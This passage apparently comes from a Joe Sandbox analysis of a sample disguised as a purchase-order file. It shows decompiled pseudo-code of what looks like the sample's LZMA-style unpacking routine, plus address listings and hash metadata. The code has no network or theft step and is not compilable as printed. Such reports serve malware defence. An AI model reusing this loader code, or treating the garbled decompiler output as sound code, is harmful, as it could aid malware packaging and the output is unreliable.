													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                      0x00406481
                      0x00406481
                      0x00406481
                      0x00406481
                      0x00406487
                      0x0040648b
                      0x0040648f
                      0x00406499
                      0x004064a7
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00000000
                      0x00000000
                      0x004067ba
                      0x004067c3
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x00406811
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b8
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406813
                      0x00406813
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x004068c8
                      0x004068d2
                      0x004068da
                      0x004068e1
                      0x004068e3
                      0x004068ea
                      0x004068ee
                      0x004068ee
                      0x00406796
                      0x0040679c
                      0x004067a3
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x00000000
                      0x004067ae
                      0x00406818
                      0x00406825
                      0x00406828
                      0x00406734
                      0x00406734
                      0x00406734
                      0x00405ed0
                      0x00405ed0
                      0x00405ed0
                      0x00405ed9
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x00405edf
                      0x00000000
                      0x00405ee6
                      0x00405eea
                      0x00000000
                      0x00000000
                      0x00405ef0
                      0x00405ef3
                      0x00405ef6
                      0x00405ef9
                      0x00405efd
                      0x00000000
                      0x00000000
                      0x00405f03
                      0x00405f03
                      0x00405f06
                      0x00405f08
                      0x00405f09
                      0x00405f0c
                      0x00405f0e
                      0x00405f0f
                      0x00405f11
                      0x00405f14
                      0x00405f19
                      0x00405f1e
                      0x00405f27
                      0x00405f3a
                      0x00405f3d
                      0x00405f49
                      0x00405f71
                      0x00405f73
                      0x00405f81
                      0x00405f81
                      0x00405f85
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405f75
                      0x00405f75
                      0x00405f78
                      0x00405f79
                      0x00405f79
                      0x00000000
                      0x00405f75
                      0x00405f4b
                      0x00405f4f
                      0x00405f54
                      0x00405f54
                      0x00405f5d
                      0x00405f65
                      0x00405f68
                      0x00000000
                      0x00405f6e
                      0x00405f6e
                      0x00000000
                      0x00405f6e
                      0x00000000
                      0x00405f8b
                      0x00405f8b
                      0x00405f8f
                      0x0040683b
                      0x0040683b
                      0x00000000
                      0x0040683b
                      0x00405f95
                      0x00405f98
                      0x00405fa8
                      0x00405fab
                      0x00405fae
                      0x00405fae
                      0x00405fae
                      0x00405fb1
                      0x00405fb5
                      0x00000000
                      0x00000000
                      0x00405fb7
                      0x00405fb7
                      0x00405fbd
                      0x00405fe7
                      0x00405fed
                      0x00405ff4
                      0x00000000
                      0x00405ff4
                      0x00405fbf
                      0x00405fc3
                      0x00405fc6
                      0x00405fcb
                      0x00405fcb
                      0x00405fd6
                      0x00405fde
                      0x00405fe1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406026
                      0x0040602c
                      0x0040602f
                      0x0040603c
                      0x00406044
                      0x00000000
                      0x00000000
                      0x00405ffb
                      0x00405ffb
                      0x00405fff
                      0x0040684a
                      0x0040684a
                      0x00000000
                      0x0040684a
                      0x00406005
                      0x0040600b
                      0x00406016
                      0x00406016
                      0x00406016
                      0x00406019
                      0x0040601c
                      0x0040601f
                      0x00406024
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406709
                      0x0040670d
                      0x004068bc
                      0x004068bc
                      0x00000000
                      0x004068bc
                      0x00406713
                      0x00406719
                      0x00406720
                      0x00406728
                      0x0040672b
                      0x0040672e
                      0x0040672e
                      0x00406734
                      0x00406734
                      0x00000000
                      0x00000000
                      0x0040604c
                      0x0040604c
                      0x0040604e
                      0x00406051
                      0x004060c2
                      0x004060c2
                      0x004060c5
                      0x004060c8
                      0x004060cf
                      0x004060d9
                      0x00000000
                      0x004060d9
                      0x00406053
                      0x00406053
                      0x00406057
                      0x0040605a
                      0x0040605c
                      0x0040605f
                      0x00406062
                      0x00406064
                      0x00406067
                      0x00406069
                      0x0040606e
                      0x00406071
                      0x00406074
                      0x00406078
                      0x0040607f
                      0x00406082
                      0x00406089
                      0x0040608d
                      0x00406095
                      0x00406095
                      0x00406095
                      0x0040608f
                      0x0040608f
                      0x0040608f
                      0x00406084
                      0x00406084
                      0x00406084
                      0x00406099
                      0x0040609c
                      0x004060ba
                      0x004060ba
                      0x004060bc
                      0x00000000
                      0x0040609e
                      0x0040609e
                      0x0040609e
                      0x004060a1
                      0x004060a4
                      0x004060a7
                      0x004060a9
                      0x004060a9
                      0x004060a9
                      0x004060ac
                      0x004060af
                      0x004060b1
                      0x004060b2
                      0x004060b5
                      0x00000000
                      0x004060b5
                      0x00000000
                      0x004062eb
                      0x004062eb
                      0x004062ef
                      0x0040630d
                      0x0040630d
                      0x00406310
                      0x00406317
                      0x0040631a
                      0x0040631d
                      0x00406320
                      0x00406323
                      0x00406326
                      0x00406328
                      0x0040632f
                      0x00406330
                      0x00406332
                      0x00406335
                      0x00406338
                      0x0040633b
                      0x0040633b
                      0x00406340
                      0x00000000
                      0x00406340
                      0x004062f1
                      0x004062f1
                      0x004062f4
                      0x004062f7
                      0x00406301
                      0x00000000
                      0x00000000
                      0x00406355
                      0x00406355
                      0x00406359
                      0x0040637c
                      0x0040637f
                      0x00406382
                      0x0040638c
                      0x0040635b
                      0x0040635b
                      0x0040635e
                      0x00406361
                      0x00406364
                      0x00406371
                      0x00406374
                      0x00406374
                      0x00000000
                      0x00000000
                      0x00406398
                      0x00406398
                      0x0040639c
                      0x00000000
                      0x00000000
                      0x004063a2
                      0x004063a2
                      0x004063a6
                      0x00000000
                      0x00000000
                      0x004063ac
                      0x004063ac
                      0x004063ae
                      0x004063b2
                      0x004063b2
                      0x004063b5
                      0x004063b9
                      0x00000000
                      0x00000000
                      0x00406409
                      0x00406409
                      0x0040640d
                      0x00406414
                      0x00406414
                      0x00406417
                      0x0040641a
                      0x00406424
                      0x00000000
                      0x00406424
                      0x0040640f
                      0x0040640f
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406430
                      0x00406434
                      0x0040643b
                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x0040644a
                      0x0040644a
                      0x0040644d
                      0x00406450
                      0x00406453
                      0x00406453
                      0x00406456
                      0x0040645d
                      0x00406462
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x004060e5
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x00406856
                      0x00000000
                      0x00406856
                      0x004060ef
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406104
                      0x00406107
                      0x0040610a
                      0x0040610a
                      0x0040610d
                      0x00406110
                      0x00000000
                      0x00000000
                      0x00406116
                      0x00406116
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00406343
                      0x00406343
                      0x00406346
                      0x00000000
                      0x00000000
                      0x00406682
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00406688
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x0040678a
                      0x00406745
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406830
                      0x00406833
                      0x00406734
                      0x00406734
                      0x00406734
                      0x00000000
                      0x0040673a
                      0x00000000
                      0x0040646a
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x0040678a
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004064af
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x00406548
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004067b4
                      0x0040677d

                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                      • Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
                      • Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                      • Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406682, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                      Download Yara Rule
                      C-Code - Quality: 98%
                      			E00406682() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
